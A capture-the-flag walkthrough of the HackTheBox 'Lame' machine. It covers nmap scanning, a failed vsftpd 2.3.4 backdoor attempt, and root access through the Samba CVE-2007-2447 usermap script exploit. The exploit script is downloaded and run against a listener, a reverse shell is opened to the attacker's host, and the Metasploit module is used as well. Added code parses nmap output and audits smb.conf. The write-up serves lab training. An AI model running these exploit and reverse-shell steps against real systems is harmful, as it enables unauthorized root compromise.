Lame
This machine gave me a hard time: not because of its difficulty, but because of an nmap regression in version 7.80. To work around it, I set up a machine with nmap compiled from the latest source code.
Ports scan
This was the first port scan; the Samba version is not identified because the NSE scripts failed.
# Nmap 7.80 scan initiated Wed Nov 13 15:38:10 2019 as: nmap -v -sC -sV -p 21,22,139,445,3632 -oN nmap780.txt lame
Nmap scan report for lame (10.10.10.3)
Host is up (0.072s latency).
rDNS record for 10.10.10.3: lame.htb

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.34
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 13 15:39:02 2019 -- 1 IP address (1 host up) scanned in 52.27 seconds
With nmap built from the latest source (7.80SVN), all the information is there.
# Nmap 7.80SVN scan initiated Wed Nov 13 20:42:26 2019 as: nmap -v -sC -sV -p 21,22,139,445,3632 -oN nmap780GIT.txt lame
Nmap scan report for lame (10.10.10.3)
Host is up (0.045s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.34
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h30m23s, deviation: 3h32m10s, median: 21s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2019-11-13T15:43:05-05:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 13 20:43:19 2019 -- 1 IP address (1 host up) scanned in 53.24 seconds
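The regression is easier to see mechanically than by eye. The following is an added example (not part of the original page) that parses nmap's normal output format and diffs the two scans; the two scan excerpts are constructed from the output above, shortened and re-indented the way nmap prints them.

```python
import re

# Constructed excerpts of the two scans above (nmap 7.80, then the SVN build).
SCAN_780 = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Host script results:
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
"""
SCAN_SVN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
|_  OS: Unix (Samba 3.0.20-Debian)
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Only a script's first line has its name right after "| " or "|_";
# continuation lines are indented further and deliberately do not match.
SCRIPT_RE = re.compile(r"^\|[_ ]([A-Za-z0-9-]+):\s*(.*)$")

def parse_nmap(text):
    """Return ({'port/proto': (state, service, version)}, {script: first line})."""
    ports, scripts = {}, {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports[f"{m[1]}/{m[2]}"] = (m[3], m[4], m[5].strip())
            continue
        m = SCRIPT_RE.match(line)
        if m:
            scripts[m[1]] = m[2].strip()
    return ports, scripts

def failed_scripts(text):
    """NSE scripts whose first output line is an execution error."""
    return sorted(n for n, out in parse_nmap(text)[1].items() if out.startswith("ERROR:"))

def diff_scans(old, new):
    """(key, old, new) for every port version or script result that differs."""
    changes = []
    for o, n in zip(parse_nmap(old), parse_nmap(new)):
        for key in sorted(o.keys() | n.keys()):
            if o.get(key) != n.get(key):
                changes.append((key, o.get(key), n.get(key)))
    return changes
```

Run on the two real scan files (`-oN` output) the same diff shows exactly which version strings and host scripts the regression cost you.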
vsftpd 2.3.4
This version of vsftpd has a backdoor installed.
root@kali:~/HTB/Machines/Lame/doc# searchsploit vsftpd 2.3.4
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Execut | exploits/unix/remote/17491.rb
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
root@kali:~/HTB/Machines/Lame/doc# searchsploit -p 17491
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
      URL: https://www.exploit-db.com/exploits/17491
     Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
If we check the URL from the exploit file, https://www.exploit-db.com/exploits/17491, we see that normally a shell is launched on port 6200 once a connection is opened.
Opening the backdoor
From a console:
root@kali:~/HTB/Machines/Lame/doc# ftp lame
Connected to lame.htb.
220 (vsFTPd 2.3.4)
Name (lame:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
From a second console:
root@kali:~/HTB/Machines/Lame/doc# telnet lame 6200
Trying 10.10.10.3...
But it doesn't work. Perhaps the backdoor port is blocked by the host's firewall.
Metasploit attempt
root@kali:~/HTB/Machines/Lame# msfconsole
msf5 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Samba 3.0.20
root@kali:~/HTB/Machines/Lame# searchsploit samba 3.0.20
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' | exploits/unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | exploits/linux/remote/7701.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
root@kali:~/HTB/Machines/Lame# searchsploit -p 16320
  Exploit: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
      URL: https://www.exploit-db.com/exploits/16320
     Path: /usr/share/exploitdb/exploits/unix/remote/16320.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Searching by CVE number, we find a Python script that exploits this vulnerability:
usermap_script.py
Installation
root@kali:~/HTB/Machines/Lame# wget https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py
root@kali:~/HTB/Machines/Lame# python usermap_script.py
Traceback (most recent call last):
  File "usermap_script.py", line 8, in <module>
    from smb.SMBConnection import SMBConnection
ImportError: No module named smb.SMBConnection

The missing module is pysmb: https://pysmb.readthedocs.io/en/latest/api/smb_SMBConnection.html

root@kali:~/HTB/Machines/Lame# pip install pysmb
Collecting pysmb
  Downloading https://files.pythonhosted.org/packages/90/61/4e08cbd8485f76485e037091a2a0c28caecf0305ea32efb2a0d6d08b797c/pysmb-1.1.27.zip (1.3MB)
    100% |████████████████████████████████| 1.3MB 984kB/s
Requirement already satisfied: pyasn1 in /usr/lib/python2.7/dist-packages (from pysmb) (0.4.2)
Building wheels for collected packages: pysmb
  Running setup.py bdist_wheel for pysmb ... done
  Stored in directory: /root/.cache/pip/wheels/9a/db/cd/e9ae94b31b8f7c10345fcff78ebd016bf5697df80268cdfa07
Successfully built pysmb
Installing collected packages: pysmb
Successfully installed pysmb-1.1.27
Exploitation
root@kali:~/HTB/Machines/Lame# python usermap_script.py
[*] CVE-2007-2447 - Samba usermap script
[-] usage: python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
Open listener
root@kali:~/HTB/Machines/Lame/doc# nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Run script
root@kali:~/HTB/Machines/Lame# python usermap_script.py 10.10.10.3 445 10.10.14.34 4444
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
On the netcat console, the shell is then upgraded to a proper pty:
root@kali:~/HTB/Machines/Lame/doc# nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:40344.
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/# ^Z
[1]+  Stopped                 nc -lvnp 4444
root@kali:~/HTB/Machines/Lame/doc# stty rows 24 columns 134
root@kali:~/HTB/Machines/Lame/doc# stty raw -echo
root@kali:~/HTB/Machines/Lame/doc# fg
nc -lvnp 4444
export TERM=screen
root@lame:/# whoami
root
Using Metasploit
root@kali:~/HTB/Machines/Lame# msfconsole
msf5 > search samba 3.0.20
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 10.10.14.34:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo UktlFXns9zNCNuiC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "UktlFXns9zNCNuiC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.34:4444 -> 10.10.10.3:51760) at 2019-11-13 17:24:28 -0500
whoami
root
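As an added defensive counterpart to the exploitation above (example code, not from this page, the exploit's author or the Samba project): a small audit of smb.conf for the two conditions the scan and exploit relied on, the username map script option behind CVE-2007-2447 and disabled message signing. The configuration fragments are constructed; treating an unset server signing as disabled is an assumption taken from nmap's "(dangerous, but default)" note.

```python
import re

# Constructed smb.conf fragments (not taken from the target): the weak global
# section that makes the usermap-script bug reachable, and a hardened one.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Samba server
   ; maps client-supplied usernames through an external script
   username map script = /etc/samba/scripts/mapusers.sh
   server signing = disabled
"""
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Samba server
   server signing = mandatory
"""

def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}}; comments ('#', ';') and blanks are skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m[1].strip().lower()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            # Samba ignores case and internal spacing in parameter names
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections

def audit_smb_conf(text):
    """Findings matching what the scan above reported: usermap script and signing."""
    g = parse_smb_conf(text).get("global", {})
    findings = []
    if "username map script" in g:
        findings.append("username map script is set: on Samba 3.0.20-3.0.25rc2 "
                        "(CVE-2007-2447) a client's username reaches its shell command line")
    # Assumption, matching nmap's "(dangerous, but default)": unset means disabled.
    if g.get("server signing", "disabled").lower() in ("disabled", "no", "false", "off"):
        findings.append("server signing is not enforced: SMB message signing disabled")
    return findings
```

The version range is not in smb.conf itself, so the first finding flags the option wherever it appears and leaves the version check to the scan.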
User flag
root@lame:/# cd /home/
root@lame:/home# ls -ltr
total 16
drwxr-xr-x 2 root    nogroup 4096 Mar 17  2010 ftp
drwxr-xr-x 2 service service 4096 Apr 16  2010 service
drwxr-xr-x 3 1001    1001    4096 May  7  2010 user
drwxr-xr-x 2 makis   makis   4096 Mar 14  2017 makis
root@lame:/home# cd makis/
root@lame:/home/makis# cat user.txt
<USER FLAG>
Root flag
root@lame:/# cat /root/root.txt
<ROOT FLAG>
References
- Regression smb_enum_users and shares on Nmap V 7.80
- METASPLOIT UNLEASHED – FREE ETHICAL HACKING COURSE
Daniel Simao 22:51, 10 November 2019 (EST)